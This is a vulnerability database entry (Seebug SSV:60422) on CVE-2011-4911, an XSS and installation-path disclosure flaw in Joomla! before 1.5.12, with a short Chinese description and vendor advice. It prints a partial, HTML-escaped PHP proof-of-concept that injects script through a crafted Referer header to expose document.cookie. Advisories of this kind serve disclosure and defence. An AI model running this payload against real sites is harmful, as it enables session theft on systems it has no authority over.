Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:60422
HistoryOct 10, 2012 - 12:00 a.m.

Joomla! < 1.5.12 跨站脚本执行和信息泄露漏洞

2012-10-1000:00:00
Root
www.seebug.org
17

0.004 Low

EPSS

Percentile

73.3%

JSON

CVE ID: CVE-2011-4911

Joomla!是一款开放源码的内容管理系统(CMS)。

Joomla! 1.5.12之前版本没有在某些文件中执行JEXEC检查,可允许远程攻击者获取安装路径。
0
Joomla! < 1.5.12
厂商补丁:

Joomla!

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.joomla.org/


                                                /* PoC: XSS Joomla 1.5.11 Juan Galiana Lara Internet Security Auditors Jun 2009 */ /* config */ $site='localhost'; $path='/joomla-1.5.11'; $cookname='d85558a8cf943386aaa374896bfd3d99'; $cookvalue='4ab56fdd83bcad86289726aead602699'; class cURL { var $headers; var $user_agent; var $compression; var $cookie_file; var $proxy; /* evil script */ var $xss='alert(&quot;PWN PWN PWN: &quot; + document.cookie);'; function cURL($cookies=TRUE,$cookie='cookies.txt',$compression='gzip',$proxy='') { $this-&gt;headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'; $this-&gt;headers[] = 'Connection: Keep-Alive'; $this-&gt;headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8'; $this-&gt;headers[] = 'Referer: &quot;&gt;get('http://' . $site . $path . '/index.php?option=com_content&amp;view=article&amp;layout=form'); /* let's execute some javascript.. }:-)*/ echo $c; ?&gt;

Related

prion 1
cvelist 1
cve 1
nvd 1
prion
prion
Design/Logic Flaw
2012-10-07 21:55:00
cvelist
cvelist
CVE-2011-4911
2022-10-03 16:15:13
cve
cve
CVE-2011-4911
2022-10-03 16:15:13
nvd
nvd
CVE-2011-4911
2012-10-07 21:55:01

0.004 Low

EPSS

Percentile

73.3%

JSON
Related for SSV:60422
prion1cvelist1cve1nvd1